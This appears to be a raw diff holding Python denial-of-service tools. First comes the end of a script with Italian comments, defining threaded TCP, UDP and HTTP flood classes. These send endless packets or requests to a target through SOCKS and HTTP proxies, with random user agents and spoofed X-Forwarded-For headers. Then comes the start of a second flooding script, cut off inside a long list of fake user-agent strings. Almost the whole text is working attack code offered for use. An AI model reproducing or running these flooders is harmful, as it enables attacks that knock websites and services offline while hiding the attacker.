self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
data = random._urandom(1024) # data per il pacchetto random
|
||||
p = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data
|
||||
current = x # per dare l'id al thread
|
||||
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
|
||||
proxy = proxies[current].strip().split(':')
|
||||
else: # altrimenti lo prende a random
|
||||
proxy = random.choice(proxies).strip().split(":")
|
||||
go.wait() # aspetta che threads siano pronti
|
||||
while True:
|
||||
try:
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per il proxying via SOCKS
|
||||
s = socks.socksocket() # creazione socket
|
||||
s.connect((str(url2),int(port))) # si connette
|
||||
s.send(p) # ed invia
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
|
||||
except: # se si verifica un errore
|
||||
s.close() # intanto chiude il precedente socket non funzionante
|
||||
try:
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # poi prova ad utilizzare SOCKS4, magari e' questo il problema dell'errore
|
||||
s = socks.socksocket() # creazione socket
|
||||
s.connect((str(url2),int(port))) # connessione
|
||||
s.send(p) # invio
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
|
||||
except: # se nemmeno questo funge, allora il sock e' down
|
||||
print ("Sock down. Retrying request. @", self.counter)
|
||||
s.close() # chiude il socket e ricomincia ciclo
|
||||
|
||||
class tcpflood(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
data = random._urandom(1024) # data per il pacchetto random
|
||||
p = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data
|
||||
go.wait() # aspetta che tutti i threads siano pronti
|
||||
while True: # ciclo infinito
|
||||
try: # il try per non far chiudere il programma se qualcosa va storto
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione solito socket
|
||||
s.connect((str(url2),int(port))) # connessione al target
|
||||
s.send(p) # questo manda il pacchetto tcp creato al target
|
||||
print ("Request Sent! @", self.counter) # print richiesta + counter
|
||||
except: # se si verifica un errore
|
||||
s.close() # lo ignora e ricomincia il ciclo
|
||||
|
||||
class udpfloodproxed(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
data = random._urandom(1024) # data per il pacchetto random
|
||||
p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data
|
||||
current = x # per dare l'id al thread
|
||||
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
|
||||
proxy = proxies[current].strip().split(':')
|
||||
else: # altrimenti lo prende a random
|
||||
proxy = random.choice(proxies).strip().split(":")
|
||||
go.wait() # aspetta che threads sono pronti
|
||||
while True:
|
||||
try:
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # comando per il proxying HTTP
|
||||
s = socks.socksocket() # creazione socket
|
||||
s.connect((str(url2),int(port))) # connessione
|
||||
s.send(p) # invio
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
|
||||
except: # se qualcosa va storto
|
||||
s.close() # chiude il socket
|
||||
|
||||
class udpfloodsocked(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
data = random._urandom(1024) # data per il pacchetto random
|
||||
p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data
|
||||
current = x # per dare l'id al thread
|
||||
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
|
||||
proxy = proxies[current].strip().split(':')
|
||||
else: # altrimenti lo prende a random
|
||||
proxy = random.choice(proxies).strip().split(":")
|
||||
go.wait() # aspetta che threads siano pronti
|
||||
while True:
|
||||
try:
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per il proxying con SOCKS
|
||||
s = socks.socksocket() # creazione socket
|
||||
s.connect((str(url2),int(port))) # connessione
|
||||
s.send(p) # invio
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # req + counter
|
||||
except: # se qualcosa va storto questo except chiude il socket e si collega al try sotto
|
||||
s.close() # intanto chiude il precedente socket non funzionante
|
||||
try:
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # poi prova ad utilizzare SOCKS4, magari e' questo il problema dell'errore
|
||||
s = socks.socksocket() # creazione socket
|
||||
s.connect((str(url2),int(port))) # connessione
|
||||
s.send(p) # invio
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # req + counter
|
||||
except: # se nemmeno questo funge, allora il sock e' down
|
||||
print ("Sock down. Retrying request. @", self.counter)
|
||||
s.close() # chiude il socket e ricomincia ciclo
|
||||
|
||||
class udpflood(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
data = random._urandom(1024) # data per il pacchetto random
|
||||
p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data
|
||||
go.wait() # aspetta che i threads siano pronti
|
||||
while True: # ciclo infinito
|
||||
try: # il try per non far chiudere il programma se si verifica qualche errore
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione socket
|
||||
s.connect((str(url2),int(port))) # connessione al target
|
||||
s.send(p) # questo manda il pacchetto udp creato al target
|
||||
print ("Request Sent! @", self.counter) # print req + counter
|
||||
except: # se si verifica un errore
|
||||
s.close() # lo ignora e ricomincia il ciclo
|
||||
|
||||
class requestproxy(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
useragent = "User-Agent: " + random.choice(useragents) + "\r\n" # scelta useragent a caso
|
||||
accept = random.choice(acceptall) # scelta header accept a caso
|
||||
randomip = str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
|
||||
forward = "X-Forwarded-For: " + randomip + "\r\n" # X-Forwarded-For, un header HTTP che permette di incrementare anonimato (vedi google per info)
|
||||
request = get_host + useragent + accept + forward + connection + "\r\n" # ecco la final request
|
||||
current = x # per dare l'id al thread
|
||||
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
|
||||
proxy = proxies[current].strip().split(':')
|
||||
else: # altrimenti lo prende a random
|
||||
proxy = random.choice(proxies).strip().split(":")
|
||||
go.wait() # aspetta che i threads siano pronti
|
||||
while True: # ciclo infinito
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # ecco il nostro socket
|
||||
s.connect((str(proxy[0]), int(proxy[1]))) # connessione al proxy
|
||||
s.send(str.encode(request)) # encode in bytes della richiesta HTTP
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print delle richieste
|
||||
except:
|
||||
s.close() # se qualcosa va storto, chiude il socket e il ciclo ricomincia
|
||||
|
||||
class requestsocks(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
useragent = "User-Agent: " + random.choice(useragents) + "\r\n" # scelta proxy a caso
|
||||
accept = random.choice(acceptall) # scelta accept a caso
|
||||
request = get_host + useragent + accept + connection + "\r\n" # composizione final request
|
||||
current = x # per dare l'id al thread
|
||||
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
|
||||
proxy = proxies[current].strip().split(':')
|
||||
else: # altrimenti lo prende a random
|
||||
proxy = random.choice(proxies).strip().split(":")
|
||||
go.wait() # aspetta che threads siano pronti
|
||||
while True:
|
||||
try:
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per proxarci con i socks
|
||||
s = socks.socksocket() # creazione socket con pysocks
|
||||
s.connect((str(url2), int(urlport))) # connessione
|
||||
s.send (str.encode(request)) # invio
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
|
||||
except: # se qualcosa va storto questo except chiude il socket e si collega al try sotto
|
||||
s.close() # chiude socket
|
||||
try: # il try prova a vedere se l'errore e' causato dalla tipologia di socks errata, infatti prova con SOCKS4
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # prova con SOCKS4
|
||||
s = socks.socksocket() # creazione nuovo socket
|
||||
s.connect((str(url2), int(urlport))) # connessione
|
||||
s.send (str.encode(request)) # invio
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
|
||||
except:
|
||||
print ("Sock down. Retrying request. @", self.counter)
|
||||
s.close() # se nemmeno con quel try si e' riuscito a inviare niente, allora il sock e' down e chiude il socket.
|
||||
|
||||
class requestdefault(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
useragent = "User-Agent: " + random.choice(useragents) + "\r\n" # useragent a caso
|
||||
accept = random.choice(acceptall) # accept a caso
|
||||
request = get_host + useragent + accept + connection + "\r\n" # composizione final request
|
||||
go.wait() # aspetta che i threads siano pronti
|
||||
while True:
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione socket
|
||||
s.connect((str(url2), int(urlport))) # connessione
|
||||
s.send (str.encode(request)) # invio
|
||||
print ("Request sent! @", self.counter) # print req + counter
|
||||
except: # se qualcosa va storto
|
||||
s.close() # chiude socket e ricomincia
|
||||
|
||||
checkurl() # questo fa startare la prima funzione del programma, che a sua volta ne starta un altra, poi un altra, fino ad arrivare all'attacco.
|
Binary file not shown.
|
@ -0,0 +1,803 @@
|
|||
#coding: utf8
|
||||
|
||||
import random
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
import sys
|
||||
|
||||
class bcolors:
|
||||
RED = '\033[91m'
|
||||
GREEN = '\033[92m'
|
||||
BLUE = '\033[94m'
|
||||
CYAN = '\033[96m'
|
||||
WHITE = '\033[97m'
|
||||
YELLOW = '\033[93m'
|
||||
GREY = '\033[90m'
|
||||
|
||||
userAgents = [
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
|
||||
"Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
|
||||
"Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
|
||||
"Opera/6.04 (Windows XP; U) [en]",
|
||||
"Opera/9.99 (X11; U; sk)",
|
||||
"Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
|
||||
"Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
|
||||
"Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
|
||||
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
|
||||
"Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
|
||||
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
|
||||
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
|
||||
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
|
||||
"Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
|
||||
"Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
|
||||
"Mozilla/5.0 (PLAYSTATION 3; 3.55)",
|
||||
"Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
|
||||
"wii libnup/1.0",
|
||||
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
|
||||
"PSP (PlayStation Portable); 2.00",
|
||||
"Bunjalloo/0.7.6(Nintendo DS;U;en)",
|
||||
"Doris/1.15 [en] (Symbian)",
|
||||
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
|
||||
"BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
|
||||
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
|
||||
"Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
|
||||
"Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
|
||||
"Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
|
||||
"SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
|
||||
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
|
||||
"MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
|
||||
"Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
|
||||
"Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
|
||||
"MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1",
|
||||
"Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 "
|
||||
"Firefox/3.5.3",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 "
|
||||
"Firefox/3.5.3 (.NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) "
|
||||
"Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) "
|
||||
"Gecko/20090718 Firefox/3.5.1",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 "
|
||||
"(KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; "
|
||||
"SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; "
|
||||
".NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR "
|
||||
"3.0.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; "
|
||||
"Trident/4.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; "
|
||||
".NET CLR 2.0.50727; InfoPath.2)",
|
||||
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
|
||||
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
|
||||
"Chrome/41.0.2228.0 Safari/537.36",
|
||||
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 "
|
||||
"Version/12.16",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like "
|
||||
"Gecko",
|
||||
"Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) "
|
||||
"like Gecko",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 "
|
||||
"(KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
|
||||
"Baiduspider+(+http://www.baidu.com/search/spider.htm)",
|
||||
"Mozilla/5.0 (compatible; BecomeBot/3.0; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)",
|
||||
"Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)",
|
||||
"Mozilla/5.0 (compatible; BeslistBot; nl; BeslistBot 1.0; http://www.beslist.nl/",
|
||||
"BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)",
|
||||
"zspider/0.9-dev http://feedback.redkolibri.com/",
|
||||
"Mozilla/4.0 compatible ZyBorg/1.0 DLC (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)",
|
||||
"Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)",
|
||||
"Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)",
|
||||
"Mozilla/4.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)",
|
||||
"Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)",
|
||||
"Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)",
|
||||
"Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )",
|
||||
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://sp.ask.com/docs/about/tech_crawling.html)",
|
||||
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)",
|
||||
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
|
||||
"TerrawizBot/1.0 (+http://www.terrawiz.com/bot.html)",
|
||||
"TheSuBot/0.2 (www.thesubot.de)",
|
||||
"TheSuBot/0.1 (www.thesubot.de)",
|
||||
"FAST-WebCrawler/3.8 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
|
||||
"FAST-WebCrawler/3.7/FirstPage (atw-crawler at fast dot no;http://fast.no/support/crawler.asp)",
|
||||
"FAST-WebCrawler/3.7 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
|
||||
"FAST-WebCrawler/3.6/FirstPage (atw-crawler at fast dot no;http://fast.no/support/crawler.asp)",
|
||||
"FAST-WebCrawler/3.6 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
|
||||
"FAST-WebCrawler/3.x Multimedia",
|
||||
"Mozilla/4.0 (compatible: FDSE robot)",
|
||||
"findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
|
||||
"findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)",
|
||||
"findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)",
|
||||
"findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
|
||||
"findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)",
|
||||
"Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable",
|
||||
"Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)"
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)",
|
||||
"AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)",
|
||||
"AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)",
|
||||
"magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)",
|
||||
"Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)",
|
||||
"Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)",
|
||||
"MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)",
|
||||
"MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)",
|
||||
"Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)",
|
||||
"MojeekBot/0.2 (archi; http://www.mojeek.com/bot.html)",
|
||||
"Moreoverbot/5.1 ( http://w.moreover.com; webmaster@moreover.com) Mozilla/5.0",
|
||||
"Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)",
|
||||
"msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
|
||||
"msnbot/0.9 (+http://search.msn.com/msnbot.htm)",
|
||||
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
|
||||
"MSNBOT/0.1 (http://search.msn.com/msnbot.htm)",
|
||||
"Mozilla/5.0 (compatible; mxbot/1.0; +http://www.chainn.com/mxbot.html)",
|
||||
"Mozilla/5.0 (compatible; mxbot/1.0; http://www.chainn.com/mxbot.html)",
|
||||
"NetResearchServer/4.0(loopimprovements.com/robot.html)",
|
||||
"NetResearchServer/3.5(loopimprovements.com/robot.html)",
|
||||
"NetResearchServer/2.8(loopimprovements.com/robot.html)",
|
||||
"NetResearchServer/2.7(loopimprovements.com/robot.html)",
|
||||
"NetResearchServer/2.5(loopimprovements.com/robot.html)",
|
||||
"Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)",
|
||||
"Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET ",
|
||||
"Googlebot/2.1 (http://www.googlebot.com/bot.html)",
|
||||
"Opera/9.20 (Windows NT 6.0; U; en)",
|
||||
"YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
|
||||
"Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
|
||||
"Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)",
|
||||
